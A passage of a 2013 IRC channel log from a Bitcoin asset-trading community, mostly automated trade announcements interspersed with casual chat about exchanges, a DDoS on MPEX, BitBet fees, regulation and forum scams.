Sep 22 09:59:08 [BTCTC] [FIMB] 10 @ 0.010651 = 0.1065 BTC [-] {2} Sep 22 10:06:15 [HAVELOCK] [B] [XBOND] 102 @ 0.00116507 = 0.1188 BTC [-] Sep 22 10:08:17 [MPEX] [S.MPOE] 2248 @ 0.00093545 = 2.1029 BTC [+] Sep 22 10:08:18 [BTCTC] [DMS.MINING] 4185 @ 0.00173866 = 7.2763 BTC [-] {7} Sep 22 10:10:19 [BTCTC] [LABCOIN] 294 @ 0.002608 = 0.7668 BTC [-] Sep 22 10:12:21 [HAVELOCK] [CBTC] 549 @ 0.00039101 = 0.2147 BTC [+] Sep 22 10:13:23 [HAVELOCK] [CBTC] 2378 @ 0.00039101 = 0.9298 BTC [+] {3} Sep 22 10:14:24 [HAVELOCK] [NEOBEE] 513 @ 0.00299999 = 1.539 BTC [-] Sep 22 10:14:25 [BTCTC] [LABCOIN] 9943 @ 0.00255327 = 25.3872 BTC [-] {15} Sep 22 10:14:25 [HAVELOCK] [CBTC] 7366 @ 0.000391 = 2.8801 BTC [-] {3} Sep 22 10:15:25 [BTCTC] [LABCOIN] 377 @ 0.00243803 = 0.9191 BTC [-] {2} Sep 22 10:15:25 [HAVELOCK] [B] [XBOND] 382 @ 0.00116149 = 0.4437 BTC [-] {7} Sep 22 10:17:27 [BTCTC] [LABCOIN] 25338 @ 0.00235025 = 59.5506 BTC [-] {12} Sep 22 10:18:28 [BTCTC] [LABCOIN] 9510 @ 0.00227303 = 21.6165 BTC [-] {7} Sep 22 10:19:29 [BTCTC] [LABCOIN] 392 @ 0.002498 = 0.9792 BTC [+] Sep 22 10:20:30 [HAVELOCK] [NEOBEE] 650 @ 0.003 = 1.95 BTC [+] Sep 22 10:23:33 [BTCTC] [LABCOIN] 1678 @ 0.00218989 = 3.6746 BTC [-] {4} Sep 22 10:23:33 [HAVELOCK] [NEOBEE] 250 @ 0.003 = 0.75 BTC [+] Sep 22 10:24:34 [BTCTC] [LABCOIN] 6300 @ 0.00207737 = 13.0874 BTC [-] {9} Sep 22 10:26:36 [BTCTC] [LABCOIN] 3000 @ 0.002228 = 6.684 BTC [+] Sep 22 10:30:40 [HAVELOCK] [CBTC] 354 @ 0.00042598 = 0.1508 BTC [+] {2} Sep 22 10:31:41 [BTCTC] [ET.DIFF.FUTURE] 100 @ 0.0204 = 2.04 BTC Sep 22 10:32:42 [BTCTC] [LABCOIN] 500 @ 0.00228899 = 1.1445 BTC [+] {2} Sep 22 10:33:43 [BTCTC] [LABCOIN] 1582 @ 0.00228812 = 3.6198 BTC [-] {3} Sep 22 10:34:44 [BTCTC] [LABCOIN] 1892 @ 0.00239858 = 4.5381 BTC [+] {2} Sep 22 10:36:46 [HAVELOCK] [NEOBEE] 56 @ 0.003 = 0.168 BTC [+] Sep 22 10:36:47 [BTCTC] [LABCOIN] 392 @ 0.002468 = 0.9675 BTC [+] Sep 22 10:36:47 [BTCTC] [TAT.NEOBEE] 100 @ 0.002997 = 0.2997 BTC [-] Sep 22 10:37:47 [BTCTC] [LABCOIN] 608 @ 0.002468 = 1.5005 BTC [+] {2} Sep 22 10:38:48 [BTCTC] [LABCOIN] 26166 @ 0.00253868 = 66.4271 BTC [+] {16} Sep 22 10:39:49 [BTCTC] [LABCOIN] 600 @ 0.0026 = 1.56 BTC [+] {2} Sep 22 10:41:51 [BTCTC] [LABCOIN] 3477 @ 0.002625 = 9.1271 BTC [+] Sep 22 10:43:52 [BTCTC] [LABCOIN] 700 @ 0.00269761 = 1.8883 BTC [+] {3} Sep 22 10:46:55 [BTCTC] [TAT.ASICMINER] 29 @ 0.01591965 = 0.4617 BTC [+] {2} Sep 22 10:47:56 [BTCTC] [LABCOIN] 400 @ 0.002625 = 1.05 BTC [-] Sep 22 10:54:02 [BTCTC] [LABCOIN] 11272 @ 0.00269905 = 30.4237 BTC [+] {6} Sep 22 10:56:04 [BTCTC] [LABCOIN] 2496 @ 0.00244071 = 6.092 BTC [-] {4} Sep 22 10:58:06 [BTCTC] [LABCOIN] 106 @ 0.00245147 = 0.2599 BTC [+] {2} Sep 22 10:59:07 [BTCTC] [LABCOIN] 405 @ 0.002673 = 1.0826 BTC [+] Sep 22 11:00:08 [MPEX] [S.MPOE] 1418 @ 0.00093279 = 1.3227 BTC [-] Sep 22 11:01:09 [HAVELOCK] [LABCO] 47 @ 0.00304998 = 0.1433 BTC [+] Sep 22 11:01:11 [BTCTC] [CRYPTO-TRADE] 3 @ 0.1969 = 0.5907 BTC [-] Sep 22 11:02:10 [BTCTC] [LABCOIN] 421 @ 0.00240152 = 1.011 BTC [-] {3} Sep 22 11:03:11 [BTCTC] [LABCOIN] 83 @ 0.002357 = 0.1956 BTC [-] Sep 22 11:04:23 https://bitcointalk.org/index.php?topic=263445.msg3208568#msg3208568 Sep 22 11:04:29 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Sep 22 11:04:35 sry wrong channel again Sep 22 11:09:17 [BTCTC] [ACTIVEMINING] 430 @ 0.0016246 = 0.6986 BTC [+] {3} Sep 22 11:10:19 [BTCTC] [LABCOIN] 430 @ 0.00269886 = 1.1605 BTC [+] {2} Sep 22 11:11:41 http://www.factandfallacy.com/?p=35 Sep 22 11:11:51 Your Guide to the “Could Be Worsers” | Fact and Fallacy Sep 22 11:12:21 [BTCTC] [ASICMINER-PT] 2 @ 1.643 = 3.286 BTC [-] Sep 22 11:15:24 [BTCTC] [TAT.ASICMINER] 23 @ 0.01545304 = 0.3554 BTC [-] {3} Sep 22 11:21:30 [BTCTC] [LABCOIN] 280 @ 0.00255803 = 0.7162 BTC [-] {3} Sep 22 11:22:31 [BTCTC] [LABCOIN] 999 @ 0.002687 = 2.6843 BTC [+] Sep 22 11:25:34 [BTCTC] [BTC-BOND] 10 @ 0.0101 = 0.101 BTC [+] {2} Sep 22 11:25:34 [BTCTC] [ASICMINER-PT] 5 @ 1.6402 = 8.201 BTC [-] {2} Sep 22 11:27:36 [HAVELOCK] [LABCO] 1000 @ 0.00304998 = 3.05 BTC [+] Sep 22 11:32:41 [BTCTC] [LABCOIN] 200 @ 0.00256802 = 0.5136 BTC [-] {2} Sep 22 11:35:44 [BTCTC] [ASICMINER-PT] 1 @ 1.661 BTC [+] Sep 22 11:40:49 [BTCTC] [LABCOIN] 200 @ 0.002568 = 0.5136 BTC [-] Sep 22 11:42:51 [BTCTC] [LABCOIN] 605 @ 0.002568 = 1.5536 BTC [-] Sep 22 11:44:53 [BTCTC] [LABCOIN] 3825 @ 0.00268567 = 10.2727 BTC [+] {7} Sep 22 12:10:18 [BTCTC] [LABCOIN] 500 @ 0.00251185 = 1.2559 BTC [-] {4} Sep 22 12:18:25 [BTCTC] [LABCOIN] 720 @ 0.00253777 = 1.8272 BTC [+] {2} Sep 22 12:19:27 [BTCTC] [LABCOIN] 1000 @ 0.00250864 = 2.5086 BTC [-] {2} Sep 22 12:20:28 [BTCTC] [LABCOIN] 251 @ 0.00251 = 0.63 BTC [+] {4} Sep 22 12:23:31 [MPEX] [S.MPOE] 2000 @ 0.00093119 = 1.8624 BTC [-] Sep 22 12:25:33 [BTCTC] [LABCOIN] 526 @ 0.00250922 = 1.3198 BTC [-] {4} Sep 22 12:36:44 [BTCTC] [LABCOIN] 1208 @ 0.00250289 = 3.0235 BTC [-] {5} Sep 22 12:38:46 [BTCTC] [LABCOIN] 2006 @ 0.00250087 = 5.0167 BTC [-] {4} Sep 22 12:39:47 [BTCTC] [LABCOIN] 2638 @ 0.00246088 = 6.4918 BTC [-] {8} Sep 22 12:39:47 [BTCTC] [ASICMINER-PT] 1 @ 1.64 BTC [-] Sep 22 12:40:31 hi all Sep 22 12:40:48 [BTCTC] [LABCOIN] 6396 @ 0.00237345 = 15.1806 BTC [-] {5} Sep 22 12:40:52 hi Sep 22 12:41:01 hi Sep 22 12:41:38 hi Sep 22 12:42:32 anyone going to holland? Sep 22 12:42:50 [BTCTC] [LABCOIN] 2250 @ 0.002355 = 5.2988 BTC [-] Sep 22 12:42:51 to listen to those scammers? Sep 22 12:42:53 no thanks Sep 22 12:42:59 i have plents of those on the forums Sep 22 12:43:25 im not much for ted talks either, but those dutch girls, how can they be so blande with so much melanin? Sep 22 12:43:52 seriously Sep 22 12:43:59 half of the attendance is scammer or idiot Sep 22 12:44:05 no shit Sep 22 12:44:12 really sad Sep 22 12:44:29 you're going all the way to dutchland to see blonde girls ?! Sep 22 12:44:44 id get a new suit cut and go just to look cool if mp was there :) Sep 22 12:44:53 haha Sep 22 12:45:03 or anyone interesting Sep 22 12:46:13 how about this neobee huh? Sep 22 12:46:26 he will be there i heard Sep 22 12:46:32 hehe Sep 22 12:46:32 mp? Sep 22 12:46:37 no neobee Sep 22 12:46:40 oh neo Sep 22 12:46:57 brb need to make some coffee Sep 22 12:47:55 [BTCTC] [CB.IDIFF-E] 300 @ 0.02492192 = 7.4766 BTC [+] {4} Sep 22 12:47:55 [BTCTC] [LABCOIN] 20000 @ 0.00230568 = 46.1136 BTC [-] {9} Sep 22 12:48:56 [BTCTC] [LABCOIN] 5000 @ 0.0023 = 11.5 BTC [-] {2} Sep 22 12:49:57 [BTCTC] [LABCOIN] 513 @ 0.0023 = 1.1799 BTC [-] {2} Sep 22 12:50:58 [BTCTC] [ASICMINER-PT] 23 @ 1.66356521 = 38.262 BTC [+] {6} Sep 22 12:54:01 [BTCTC] [LABCOIN] 4175 @ 0.0022146 = 9.246 BTC [-] {19} Sep 22 12:54:01 [BTCTC] [TAT.NEOBEE] 560 @ 0.002995 = 1.6772 BTC [+] **** BEGIN LOGGING AT Sun Sep 22 21:13:38 2013 Sep 22 21:18:14 [BTCTC] [LABCOIN] 61 @ 0.00250187 = 0.1526 BTC [-] {3} Sep 22 21:18:23 https://blockchain.info/tx/6767905591307d8228b99dd22a580eb0e970e2d8a9add28bf2f3046660a1eae8 so bitbet uses patched bitcoin so such dust txs are allowed? Sep 22 21:18:25 Bitcoin Transaction 6767905591307d8228b99dd22a580eb0e970e2d8a9add28bf2f3046660a1eae8 Sep 22 21:19:09 and fee 100x higher than the payout Sep 22 21:19:14 [BTCTC] [TAT.ASICMINER] 20 @ 0.015495 = 0.3099 BTC [+] {2} Sep 22 21:19:38 mircea_popescu ^ Sep 22 21:20:17 [BTCTC] [TAT.NEOBEE] 101 @ 0.002803 = 0.2831 BTC [-] {2} Sep 22 21:20:30 I think bitcoin does not care about what the real payement is, it's still a 4 BTC transaction Sep 22 21:20:50 the fee is silly though. it could use a delayed payout and sendmany Sep 22 21:20:51 nope. the 1Eteo is my referral address Sep 22 21:21:13 I understand that. but bitcoin does not care; it sees outputs Sep 22 21:22:08 but as i understand that, outputs under 2000 satoshi are frowned upon since 0.8.something, no? Sep 22 21:22:18 [BTCTC] [TAT.NEOBEE] 1500 @ 0.00280106 = 4.2016 BTC [-] {2} Sep 22 21:23:19 [BTCTC] [TAT.NEOBEE] 1069 @ 0.002803 = 2.9964 BTC [+] Sep 22 21:23:31 jurov what would you like me to say ? Sep 22 21:24:41 i don't like whole situation..at least it sendmany could be used, no? Sep 22 21:25:00 i'll eventually end up with quite a bitdust in the wallet Sep 22 21:25:19 well, some people would like sendmany so as not to collect dust, some people want to be paid on the spot. Sep 22 21:25:25 what's one to do ? Sep 22 21:28:51 $depth s.mpoe Sep 22 21:28:52 mircea_popescu: S.MPOE Bids: ['3328 @ 0.00092451', '13150 @ 0.00092387', '2750 @ 0.00092373', '10363 @ 0.000913', '10000 @ 0.000912'] Sep 22 21:28:53 mircea_popescu: Asks: ['5400 @ 0.00093148', '7744 @ 0.00093635', '3350 @ 0.00093668', '3300 @ 0.0009376', '14000 @ 0.00093815'] Sep 22 21:29:04 mkay. we are under very heavy ddos Sep 22 21:29:07 have a threshold how much to pay on the spot, if it's less then delay the payouts Sep 22 21:29:29 some proxies may be unavailable. the main mpex.co website is for sure atm. Sep 22 21:29:31 no one would object over some 900 satoshi to be delayed Sep 22 21:29:33 use an alternative. Sep 22 21:29:46 oh.. *checks* Sep 22 21:29:47 jurov but it would require keeping data on users. Sep 22 21:29:49 I thought mpex was unstoppable Sep 22 21:29:54 pankkake mpex is. Sep 22 21:30:20 see http://trilema.com/2013/mpex-ddosed-an-epic/ if you've not seen it be4 Sep 22 21:30:30 I know, just teasing Sep 22 21:30:39 well i got woken up ;/ Sep 22 21:30:57 not about users, just payout addresses. same data you have already. Sep 22 21:31:06 sms alert? Sep 22 21:31:12 but i guess it's better to discuss some other time Sep 22 21:31:19 anyway, jurov : bbet currently is a signal processor. transforming it into a cpu would perhaps have some advantages, but also some disadvantages. atm we live with it as is and see how bad it gets. Sep 22 21:31:58 pankkake no, dev guy calling girl i was with, girl i was with waking me up and dodging blows and bullets for 30 seconds. Sep 22 21:32:37 mkay. time to prop up mpex.coinbr.com Sep 22 21:33:02 i think these have got to be some clueless butthurt scammors Sep 22 21:33:18 because apparently they don't understand how ddosing mpex works. Sep 22 21:33:29 [BTCTC] [ASICMINER-PT] 2 @ 1.663 = 3.326 BTC [-] Sep 22 21:39:58 wtf is the point of ddosing mpex? Sep 22 21:40:27 asciilifeform well since everything on the interwebs is a website, it then follows fighting websites is winning. i dunno, ipadhead logic. Sep 22 21:40:30 or is the bastard sending lifelike garbage under gpg Sep 22 21:40:43 a no. that i can quite efficiently handle :D Sep 22 21:41:59 it's a distraction, meanwhile they are invading mp's bunker Sep 22 21:42:48 .mpexlag Sep 22 21:42:56 !mpexlag Sep 22 21:42:59 what was it Sep 22 21:43:22 $mpexlag Sep 22 21:43:24 mircea_popescu: 0.107578039169 seconds Sep 22 21:43:24 iirc Sep 22 21:43:27 lolk Sep 22 21:43:44 tbh it's been 0.10x since january or w/e Sep 22 21:43:59 but meanwhile mtgox' great summer of lag is all but forgotten huh. Sep 22 21:45:28 I have a bet complaint, mpex missing from list: http://bitbet.us/bet/495/there-will-be-blood/ Sep 22 21:45:30 :) Sep 22 21:45:48 it lives Sep 22 21:46:42 [HAVELOCK] [B] [XBOND] 868 @ 0.00115132 = 0.9993 BTC [-] {8} Sep 22 21:46:43 what is sex? Sep 22 21:47:45 when i need more money Sep 22 21:48:44 [HAVELOCK] [AM100] 22 @ 0.01683999 = 0.3705 BTC [+] Sep 22 21:49:13 It says some pelt-wearin' trapper, some stinkin' bean-suckin' possum skinner, he's gonna collect that reward money. Sep 22 21:49:35 !ticker h xbond Sep 22 21:49:36 [HAVELOCK:XBOND] 1D: 0.00115060 / 0.00121604 / 0.00137999 (10678 shares, 12.98488371 BTC), 7D: 0.00113005 / 0.00128563 / 0.00140000 (182474 shares, 234.59326118 BTC), 30D: 0.00100000 / 0.00117829 / 0.00142350 (489995 shares, 577.35590833 BTC) Sep 22 21:49:45 [HAVELOCK] [VTX] 2 @ 0.5799995 = 1.16 BTC [+] Sep 22 21:49:46 [BTCTC] [LABCOIN] 321 @ 0.002417 = 0.7759 BTC [-] {2} Sep 22 21:49:48 [HAVELOCK:XBOND] 1D: 0.00115060 / 0.00121604 / 0.00137999 (10678 shares, 12.98488371 BTC), 7D: 0.00113005 / 0.00128563 / 0.00140000 (182474 shares, 234.59326118 BTC), 30D: 0.00100000 / 0.00117829 / 0.00142350 (489995 shares, 577.35590833 BTC) Sep 22 21:50:46 [BTCTC] [LABCOIN] 9679 @ 0.00235497 = 22.7938 BTC [-] {9} Sep 22 21:52:13 $post PFR4nimA Sep 22 21:52:26 mircea_popescu: An error has occurred and has been logged. Please contact this bot's administrator for more information. Sep 22 21:52:31 derp what did i do now. Sep 22 21:52:48 [BTCTC] [FN] [BTC-GROWTH] 30 @ 0.09801 = 2.9403 BTC [-] Sep 22 21:53:49 [BTCTC] [FN] [BTC-GROWTH] 10 @ 0.098 = 0.98 BTC [-] Sep 22 21:55:09 $vwap Sep 22 21:55:12 mircea_popescu: http://pastebin.com/raw.php?i=mB1TR2Xk Sep 22 21:56:55 !mp http://dpaste.com/1391875/ Sep 22 21:56:56 Processing. Sep 22 21:57:54 Response: http://dpaste.com/1391876/plain/ Sep 22 21:58:08 doh. Sep 22 21:58:32 $depth s.mpoe Sep 22 21:58:33 mircea_popescu: S.MPOE Bids: ['13150 @ 0.00092387', '2750 @ 0.00092373', '10363 @ 0.000913', '10000 @ 0.000912', '25000 @ 0.00091'] Sep 22 21:58:34 mircea_popescu: Asks: ['11305 @ 0.00092424', '6344 @ 0.00092489', '5400 @ 0.00093148', '7744 @ 0.00093635', '3350 @ 0.00093668'] Sep 22 21:59:56 $mp http://dpaste.com/1391878/ Sep 22 22:00:05 !@mp http://dpaste.com/1391878/ Sep 22 22:00:07 gah Sep 22 22:00:08 !mp http://dpaste.com/1391878/ Sep 22 22:00:10 [HAVELOCK] [NEOBEE] 122 @ 0.003 = 0.366 BTC [+] Sep 22 22:00:11 Processing. Sep 22 22:00:50 i can decrypt that Sep 22 22:01:02 you can ? Sep 22 22:01:07 yea, it says "STAT" Sep 22 22:01:17 lol nope. Sep 22 22:01:21 :D Sep 22 22:01:22 ha-ha :D Sep 22 22:01:23 damn Sep 22 22:01:28 well was a good try Sep 22 22:01:34 indeed. Sep 22 22:02:05 Response: error Sep 22 22:02:08 lol Sep 22 22:02:15 lmao win. Sep 22 22:09:03 [BTCTC] [ASICMINER-PT] 2 @ 1.6055 = 3.211 BTC [-] {2} Sep 22 22:09:03 [BTCTC] [TAT.ASICMINER] 25 @ 0.01551 = 0.3878 BTC [-] Sep 22 22:10:04 [BTCTC] [COGNITIVE] 1 @ 0.1688 BTC [+] Sep 22 22:11:05 [HAVELOCK] [AM100] 42 @ 0.01651547 = 0.6936 BTC [-] {2} Sep 22 22:12:06 [BTCTC] [COGNITIVE] 2 @ 0.1689 = 0.3378 BTC [+] Sep 22 22:13:07 [BTCTC] [TAT.ASICMINER] 15 @ 0.01551 = 0.2327 BTC [-] Sep 22 22:15:31 [08:31] well theyre in canada <-- I can tell you for fact that the SEC's position is that any site that allows US users is within their jurisdiction. Sep 22 22:17:11 [BTCTC] [DMS.MINING] 100 @ 0.001575 = 0.1575 BTC [-] Sep 22 22:17:24 yeah but their drugs are way superior Sep 22 22:18:47 lol Sep 22 22:18:50 nonetheless they are in Canada Sep 22 22:18:55 and not the US Sep 22 22:19:24 and the SEC does not run Canada, so as at least *some* limit or obstacle in reaching into it Sep 22 22:19:53 i'm not saying BF can't be *more* legit Sep 22 22:20:08 merelt that at present, being in Canada provides at least this complication Sep 22 22:20:54 If the US wants to bully canada around about this issue Sep 22 22:21:02 I dont see why Canada would put up a fight Sep 22 22:21:06 especially since the market is trivial Sep 22 22:31:25 [BTCTC] [LABCOIN] 50 @ 0.002496 = 0.1248 BTC [+] Sep 22 22:35:12 to go into deeper speculation would be pointless Sep 22 22:35:20 who knows where everything will land Sep 22 22:35:29 [BTCTC] [LABCOIN] 221 @ 0.00239203 = 0.5286 BTC [-] {2} Sep 22 22:36:30 [BTCTC] [LABCOIN] 2523 @ 0.00239115 = 6.0329 BTC [-] {7} Sep 22 22:37:31 [BTCTC] [LABCOIN] 100 @ 0.002392 = 0.2392 BTC [+] Sep 22 22:42:36 [BTCTC] [TAT.NEOBEE] 50 @ 0.002975 = 0.1488 BTC [+] Sep 22 22:44:38 [BTCTC] [ACTIVEMINING] 1768 @ 0.00168827 = 2.9849 BTC [+] {14} Sep 22 22:44:38 [BTCTC] [LABCOIN] 1251 @ 0.002392 = 2.9924 BTC [+] Sep 22 22:45:40 !seen Ukyo Sep 22 22:45:43 Agreed. I just dont think the Canada card is a good bet Sep 22 22:46:05 Ukyo, you around? I broke my phone and 2-factor =( Sep 22 22:46:40 [BTCTC] [TAT.NEOBEE] 670 @ 0.002975 = 1.9933 BTC [+] Sep 22 22:49:43 [HAVELOCK] [CBTC] 9999 @ 0.00039103 = 3.9099 BTC [-] {2} Sep 22 22:49:44 $mpexlag Sep 22 22:49:45 jurov: 0.103047847748 seconds Sep 22 22:50:16 wtf it is measuring. i have almost 2 minutes here Sep 22 22:56:08 it has the blessing of grandeur lol. Sep 22 22:57:02 (it measures how long it takes stuff to make it through the edge proxies to trade engine and back, not how long it takes you to connect to edge proxies) Sep 22 22:57:31 hence mpex lag rather than randomwebroutelag. Sep 22 22:57:48 anyway, it still works if you're patient, just placed an order. Sep 22 22:58:29 working at getting rid of the remaining issues. Sep 22 23:00:41 ERROR [__main__] Unknown mpsic: S.DICE Sep 22 23:00:43 lol the good kind of error..already forgot it's still there Sep 22 23:00:51 lol Sep 22 23:01:44 it will be going away later this month btw. Sep 22 23:04:58 [BTCTC] [BASIC-MINING] 1 @ 0.106 BTC [-] Sep 22 23:04:59 [BTCTC] [ASICMINER-PT] 1 @ 1.606 BTC [+] Sep 22 23:07:01 [HAVELOCK] [AM1] 1 @ 1.76899999 BTC [+] Sep 22 23:08:02 [HAVELOCK] [AM1] 1 @ 1.76899999 BTC [+] Sep 22 23:08:03 [BTCTC] [LABCOIN] 49 @ 0.002331 = 0.1142 BTC [-] Sep 22 23:09:03 [BTCTC] [BASIC-MINING] 1 @ 0.1059 BTC [-] Sep 22 23:10:04 [BTCTC] [COGNITIVE] 1 @ 0.1704 BTC [+] Sep 22 23:11:56 "The epigrams are basically social commentary of the type that one might expect today from someone like the comedian Chris Rock, and you could also compare Martial's prominence in late first century Roman society with that of Chris Rock in current American society. But Chris Rock would never dare to tell these jokes!" Sep 22 23:12:05 from a preface on martial. in yo face, thestringpuller Sep 22 23:14:24 hello Sep 22 23:14:39 why is irc always so quiet Sep 22 23:15:17 except it's not. Sep 22 23:15:21 you ever read the logs ? Sep 22 23:18:44 there is a log? Sep 22 23:19:45 http://log.bitcoin-assets.com Sep 22 23:20:14 [BTCTC] [ACTIVEMINING] 1100 @ 0.00184712 = 2.0318 BTC [+] {7} Sep 22 23:20:36 that cant be true Sep 22 23:22:16 [BTCTC] [TAT.ASICMINER] 45 @ 0.01516444 = 0.6824 BTC [-] {4} Sep 22 23:22:35 certainly is. Sep 22 23:25:23 whatever happened to bitcoin island Sep 22 23:25:41 that boat thing ? Sep 22 23:26:11 http://bitcoinisland.org/ - this thing Sep 22 23:26:13 Bitcoin Island Sep 22 23:26:15 was it a scam? Sep 22 23:27:06 https://bitcointalk.org/index.php?topic=238628.0 - i remember seeing this Sep 22 23:27:12 bitcoin island bootcamp *scam* Sep 22 23:27:21 [BTCTC] [TAT.ASICMINER] 10 @ 0.01551 = 0.1551 BTC [+] Sep 22 23:29:06 lol Sep 22 23:29:33 what does it mean by difficulty? Sep 22 23:30:23 [BTCTC] [LABCOIN] 99 @ 0.002331 = 0.2308 BTC [-] Sep 22 23:32:41 I don't even know. Sep 22 23:32:45 U.O.E.N.O Sep 22 23:32:48 k Sep 22 23:33:01 why does it keep saying [BTCTC]"??? Sep 22 23:33:26 [HAVELOCK] [AM1] 1 @ 1.76899999 BTC [+] Sep 22 23:34:10 [HAVELOCK] [AM1] 1 @ 5000.76899999 BTC [+] Sep 22 23:34:37 lolz Sep 22 23:35:04 how did you end up here ? Sep 22 23:35:44 ^ question of the day. Sep 22 23:35:56 Tom Ford brought him here I 'spose. Sep 22 23:37:02 me? i went to google Sep 22 23:37:21 tom ford lol. Sep 22 23:37:27 "I do not want to take Telesina as a wife" "Why not?" "She is an adulteress." "But she mostly does it with boys" "A, in that case I will." Sep 22 23:37:30 [HAVELOCK] [NEOBEE] 666 @ 0.003 = 1.998 BTC [+] Sep 22 23:37:50 who wants to play prop hunt on gmod Sep 22 23:40:33 [BTCTC] [TAT.ASICMINER] 90 @ 0.01555666 = 1.4001 BTC [+] {2} Sep 23 00:08:42 sooo... after many years finally a new tagline is added to the rotation of trilema taglines. it reads : Sep 23 00:08:45 "Mentula cum doleat imperio, tibi, lector, culus. Non sum diuinus, sed scio quid facias." Sep 23 00:11:05 [HAVELOCK] [CFIG] 5 @ 0.101 = 0.505 BTC [+] Sep 23 00:12:05 [BTCTC] [LABCOIN] 59 @ 0.00241952 = 0.1428 BTC [+] {3} Sep 23 00:12:05 [BTCTC] [ASICMINER-PT] 1 @ 1.634 BTC [+] Sep 23 00:12:05 [BTCTC] [TAT.ASICMINER] 21 @ 0.01517 = 0.3186 BTC [-] {2} Sep 23 00:14:07 [HAVELOCK] [AM100] 184 @ 0.01679483 = 3.0902 BTC [+] {3} Sep 23 00:14:08 [MPEX] [S.MPOE] 5600 @ 0.00092775 = 5.1954 BTC [-] {2} Sep 23 00:15:08 [HAVELOCK] [AM100] 8 @ 0.016998 = 0.136 BTC [+] Sep 23 00:16:09 [HAVELOCK] [AM100] 100 @ 0.016999 = 1.6999 BTC [+] Sep 23 00:17:10 [HAVELOCK] [AM100] 248 @ 0.017 = 4.216 BTC [+] Sep 23 00:20:13 [BTCTC] [FN] [BTC-GROWTH] 45 @ 0.09811666 = 4.4152 BTC [+] {3} Sep 23 00:22:15 [BTCTC] [FN] [DMS.SELLING] 620 @ 0.00709893 = 4.4013 BTC [-] {3} Sep 23 00:28:21 [BTCTC] [ACTIVEMINING] 1971 @ 0.00187006 = 3.6859 BTC [+] {7} Sep 23 00:30:23 [HAVELOCK] [SDSTM] 41 @ 0.0026 = 0.1066 BTC [+] Sep 23 00:32:26 [BTCTC] [DMS.MINING] 100 @ 0.001615 = 0.1615 BTC [+] Sep 23 00:33:10 https://bitcointalk.org/index.php?topic=299748.0;topicseen Sep 23 00:33:15 GigaDice | 1% House-Edge | FREE BTC | PayPal, PM Cashouts Sep 23 00:33:37 moar dice Sep 23 00:34:05 bitbet on how long it takes paypal to gtfo? Sep 23 00:34:27 [BTCTC] [DMS.MINING] 100 @ 0.0016 = 0.16 BTC [-] Sep 23 00:36:21 "Accredited your account." Sep 23 00:36:26 is this diplomat's dice ? Sep 23 00:37:30 [MPEX] [S.MPOE] 22450 @ 0.00092896 = 20.8552 BTC [+] {3} Sep 23 00:37:33 :) Sep 23 00:43:33 titale says 1% house edge, why bet with us section says 2% Sep 23 00:43:38 title* Sep 23 00:43:58 lol garr scammer left me a feedback > A person who believes SLANDER is acceptable. Should be removed from these forums. Sep 23 00:44:33 with 'risked 500 btc' lmao Sep 23 00:47:44 that on otc ? Sep 23 00:47:52 o the forum thing Sep 23 00:48:01 ye Sep 23 00:49:42 [BTCTC] [FN] [DMS.SELLING] 1415 @ 0.007099 = 10.0451 BTC [+] Sep 23 00:50:48 and another lol https://bitcointalk.org/index.php?topic=289316.msg3212220#msg3212220 Sep 23 00:51:32 gg they're still flogging that horse? Sep 23 00:51:47 that thing still going ?! Sep 23 00:52:06 quite amazing Sep 23 00:52:07 AMAZING COMPANY! Sep 23 00:52:15 that's some pretty epic butthurt Sep 23 00:52:17 i suppose now we know we will be survived by our work. Sep 23 00:52:25 in the sense people will still discuss it long after we bite it. Sep 23 00:52:40 lol Sep 23 00:53:46 [BTCTC] [CIPHERMINE-PT] 5 @ 0.05 = 0.25 BTC [+] Sep 23 00:59:52 [BTCTC] [FN] [DMS.SELLING] 700 @ 0.007099 = 4.9693 BTC [+] Sep 23 01:05:58 [HAVELOCK] [CBTC] 10000 @ 0.0003906 = 3.906 BTC [-] {5} Sep 23 01:05:59 [HAVELOCK] [NEOBEE] 3333 @ 0.003 = 9.999 BTC [+] Sep 23 01:10:43 does anyone keep statistics to find biggest/longest flamewar ever? granted, it's difficult to measure Sep 23 01:11:11 no because a good flamewar outlasts the participants. Sep 23 01:11:30 either they grow up or move on to greener pastures with more sex and less internet. Sep 23 01:11:33 the cherry truck was decently long Sep 23 01:11:50 o you meant long as in wordcount ? Sep 23 01:23:43 http://www.cracked.com/blog/6-innocent-sounding-topics-that-are-guaranteed-flame-wars/ Sep 23 01:23:45 6 Innocent-Sounding Topics That Are Guaranteed Flame Wars | Cracked.com Sep 23 01:24:48 we already had veganism/paleo here Sep 23 01:25:14 should throw some of the other topics in here someday :) Sep 23 01:27:13 the reason this sort of shit is on cracked is that the cool guys no longer give a shit. Sep 23 01:30:11 yeah, maybe not here..but starting "declawing cats for btc" thread on the forums may be worthwhile Sep 23 01:30:31 does anyone even read cracked anymore save like fraternity guys? Sep 23 01:30:42 since you know, reading a book is too hard for them. Sep 23 01:32:33 jurov now that's an idea. Sep 23 01:43:35 [MPEX] [S.MPOE] 4247 @ 0.00092762 = 3.9396 BTC [-] Sep 23 01:48:42 this is fo the gz Sep 23 01:48:47 and dis if fo da hustlas Sep 23 01:49:41 [BTCTC] [LABCOIN] 183 @ 0.002399 = 0.439 BTC [-] Sep 23 01:49:52 this is for the gzip Sep 23 01:57:49 [BTCTC] [BASIC-MINING] 30 @ 0.11746 = 3.5238 BTC [+] {3} Sep 23 01:59:05 gzip --force Sep 23 01:59:51 [BTCTC] [LABCOIN] 5000 @ 0.00232639 = 11.632 BTC [-] {7} Sep 23 02:00:52 [HAVELOCK] [CBTC] 5964 @ 0.00039002 = 2.3261 BTC [-] {3} Sep 23 02:01:24 the cracked youtube chan is awesome Sep 23 02:01:53 [HAVELOCK] [CBTC] 2157 @ 0.00039002 = 0.8413 BTC [-] {5} Sep 23 02:02:54 [MPEX] [S.MPOE] 8300 @ 0.00092699 = 7.694 BTC [-] {2} Sep 23 02:02:55 [HAVELOCK] [CBTC] 3500 @ 0.00039 = 1.365 BTC [-] {3} Sep 23 02:03:55 [HAVELOCK] [CBTC] 5972 @ 0.00039 = 2.3291 BTC [-] {3} Sep 23 02:03:57 [BTCTC] [LABCOIN] 3805 @ 0.00230824 = 8.7829 BTC [-] {3} Sep 23 02:10:02 [BTCTC] [TAT.ASICMINER] 9 @ 0.01516 = 0.1364 BTC [-] Sep 23 02:21:19 ;;ticker Sep 23 02:21:19 MtGox BTCUSD ticker | Best bid: 133.51010, Best ask: 133.98993, Bid-ask spread: 0.47983, Last trade: 133.98994, 24 hour volume: 5509.63973337, 24 hour low: 131.00000, 24 hour high: 